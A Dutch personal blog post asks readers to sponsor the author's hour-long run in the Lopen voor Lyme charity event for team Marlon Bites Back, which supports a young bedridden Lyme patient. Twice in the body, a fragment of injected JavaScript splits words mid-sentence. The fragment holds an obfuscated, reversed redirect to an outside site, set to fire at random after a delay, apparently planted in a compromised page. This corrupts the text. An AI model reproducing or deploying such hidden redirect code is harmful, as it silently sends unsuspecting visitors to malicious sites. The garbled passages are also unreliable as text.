Lopen voor Lyme Lyme Awareness

Hulp gevraagd – Lopen voor Lyme team Marlon Bites Back

Twee jaar geleden heeft er een team van vrienden en familie voor mij meegelopen bij Lopen voor Lyme. Lopen voor Lyme is een sponsorloop waarmee geld wordt opgehaald voor  chronisch Lyme patiënten. Daarnaast wordt er hiermee aandacht gevraagd voor de vaak schrijnende situatie waar Lyme patiënten in zitten. Dit omdat zorgkosten vaak niet, of maar deels worden vergoed. Ontzettend kwalijk, want de ziekte van Lyme is een invaliderende ziekte die zelfs de dood toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot gevolg kan hebben indien er niet adequaat behandeld wordt.

Doordat mijn team Miles for Marleen voor mij heeft meegedaan, heb ik mijn behandelingen kunnen betalen. Gelukkig heeft de behandeling mij enorm veel verbetering gebracht en ben ik nu weer deels hersteld. Ik werk hard aan verder herstel, onder andere door zoveel mogelijk te sporten. Iets wat zonder Lopen voor Lyme absoluut niet mogelijk was geweest.

Marlon Bites Back

Nu vind ik het tijd om iets voor een ander terug te gaan doen. 14 april is de tweede editie van Lopen voor Lyme en ik doe mee in het team van Marlon (Marlon Bites Back). Marlon is een 19 jarig ernstig ziek meisje. Ziek sinds 2011 en sinds 2015 bed gebonden. Ik heb Marlon leren kennen via social media, maar afgelopen zomer heb ik haar voor het eerst ontmoet.  Ze is nog zo jong en al zo ontzettend lang ziek. Ik gun haar meer dan een leven dat zich alleen maar in bed afspeelt.

Lopen voor Lyme - Marlon

Daarom doe ik mee aan Lopen voor Lyme. Ik heb mijzelf als doel gesteld om een uur te gaan hardlopen. Iets waarvoor ik de laatste weken keihard aan het trainen ben. Maar ik zoek hiervoor nog sponsors! Dus wil jij mij misschien sponsoren? Dit kan al vanaf 1 euro. Ga dan naar de teampagina van team Marlon Bites Back

En als je ideeën hebt over hoe ik nog meer sponsors kan vinden dan hoor ik dit uiteraard graag. Ik kan alle hulp gebruiken! Misschien heb je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevallig wel de mogelijkheid om een donatiepotje op jouw werk neer te zetten? Of weet je misschien nog iets anders? Stuur mij dan gerust een berichtje via het contactformulier.

Facebook reacties

1 Reactie

 • Reply
  Een flinke stap vooruit - ik ben weer aan het werk
  18 februari 2018 at 19:56

  […] nog andere stappen. Alleen dan letterlijk. Ik ben nog namelijk nog steeds hard aan het trainen voor Lopen voor Lyme. Ik heb mijzelf als doel gesteld om een uur te gaan hardlopen in het team van Marlon. Of het mij […]

 • Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: